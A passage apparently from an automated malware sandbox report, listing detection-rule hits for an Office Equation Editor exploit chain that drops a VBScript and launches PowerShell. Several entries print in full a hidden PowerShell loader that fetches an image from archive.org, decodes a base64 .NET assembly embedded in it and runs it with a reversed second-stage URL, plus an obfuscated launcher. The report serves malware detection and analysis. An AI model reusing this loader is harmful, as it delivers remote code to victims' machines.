      • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

Exploits

                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 45.90.89.123, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetFilename: C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS

System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? 
?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3340, Protocol: tcp, SourceIp: 45.90.89.123, SourceIsIpv6: false, SourcePort: 80
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? 
?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Source: Process started, Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3340, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" , ProcessId: 3488, ProcessName: wscript.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3340, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3536, TargetFilename: C:\Users\user\AppData\Local\Temp\r5trqahy.yze.ps1

                Data Obfuscation

                Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'

                Stealing of Sensitive Information

